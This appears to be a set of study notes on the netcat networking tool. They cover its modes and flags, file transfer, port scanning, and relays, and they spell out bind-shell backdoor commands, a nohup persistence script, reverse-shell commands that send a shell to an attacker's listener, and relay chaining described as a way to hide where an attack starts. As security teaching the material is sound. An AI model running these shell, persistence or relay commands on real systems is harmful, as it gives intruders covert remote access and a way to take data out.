Netcat

Hobbit wrote Netcat for Unix systems in 1996. In 1998 netcat was rewritten for windows by Weld Pond. Netcat in simple terms allows you to read and write data across the network. Netcat focuses on moving raw data between ports on a system.

Netcat client

  • Client mode initiates a connection to a specific port
  • Standard input sent across the network
    • Keyboard redirected from a file or piped from an application
  • All network data returned to standard output.
  • Errors sent to standard error.
  • Supports source routing useful for spoofing.

Netcat Listen

  • Listen mode waits for connections on a specific port
  • All network data received is returned to standard out
  • Standard input sent across the network
  • Errors sent to standard error
  • The only difference is Clients initiate connections and listeners wait for them to arrive.

Netcat commands
nc <options> <target system> <remote ports>

  • -l Listen mode
  • -L Listen harder makes Netcat persistent in windows
  • -u Use UDP
  • -p Local Port (client mode, this is source port)
  • -e Execute a program after connection
  • -z zero mode used for scanning
  • -w N timeout for connects waits N seconds
  • -v verbose output

Standard Shell redirects

  • > Dump output to a file
  • < Dump input from a file
  • | Pipe output of the first program into the second program

Uses for netcat

  • Data transfer
  • Port scanning and vulnerability scanning
  • Connecting to open ports
  • Backdoors
  • Relays

Netcat has an infinite number of use cases. Use your imagination, and the possibilities are endless

Data Transfer

  • Send files between macines
    • Listener -> Client
      • Listener: nc -l -p <port> < ./PasswordFile.txt
      • Client: nc <listenerIP> <port> > passwordFile.txt
    • Client -> Listener
      • Listener: nc -l -p <port> > passwordfile.txt
      • Client: nc <listenerIP> <port> < ./passwordFile.txt
    • Works with TCP & UDP
    • Use source IP address on listerner to be stealthy and only accept connections form the source

Port and Vulnerability scanning

  • TCP & UDP port scanning
    • Linear scans by default use option -r for random scans
      • nc -v -w3 -z <target IP> <startPort>-<endPort>
      • -v Verbose output, -w3 dont wait more than 3 seconds
      • Scan any source port
      • Create a vulnerability scanner by entering dta and recording the responses
      • Netcat ships with some helpful vulnerability-scanning scripts

Connecting to open ports

The big question is why not just use telnet? Well for starters netcat is faster than telnet and when things go wrong, you can quickly kill the connection with Control+c. Netcat also handles raw binary data well, and unlike telnet, commentary messages not sent to stdout. Netcat also supports UDP, unlike telnet.

Backdoors

Backdoors give attackers persistent access to your machine. Netcat makes things very simple here.
Unix: nc -l -p <port> -e /bion/sh
Windows: nc -l -p <port> -e cmd.ext

Use the client to connect to the listener and start a shell prompt.

Netcat stops listening once the connection drops, so attackers need to do a few more things to keep the backdoor running.

In Windows you can use the -L flag to keep netcat listening.

In Unix based operating systems you will need to schedule a cron job or write a shell script.

touch backdoor.sh
nano backdoor.sh

insert the following code

echo "started";
nc -l -p <port> -e /bin/sh;

ctrl+w to write and save
ctrl+x to exit

Issue the command nohup to create a loop in the background to keep the script running even if the current user logs out after changing script permissions to read & execute with chmod.

chmod 555 backdoor.sh
nohup ./backdoor.sh

Reverse shells

This idea pushes the client shell to the attacker's server. The client would be activated periodically through a cron job.
Listener: nc -l -p <port>
Client: nc <listenerIP> <port> -e /bin/sh

System firewalls will confuse this connection as legitimate telnet, SMTP, or HTTP traffic. In actuality, the attacker has full access to the command shell to the internal system. Proxy firewalls should detect that the application-layer protocol is not being used and therefore should drop the traffic.

Netcat Relays

Relays obfuscate the originating point of attack.
Relays can also redirect data through ports allowed by the firewall.

The idea is to Setup a listener and pipe output to another client and then pipe that to another listener.

nc -l -p <port> | nc <targetServer> <outgoingPort>
nc -l -p 1111 | nc sheldyn 53142

Remember that on Unix systems you will need to use ports higher than 1023 if you do not have admin privileges.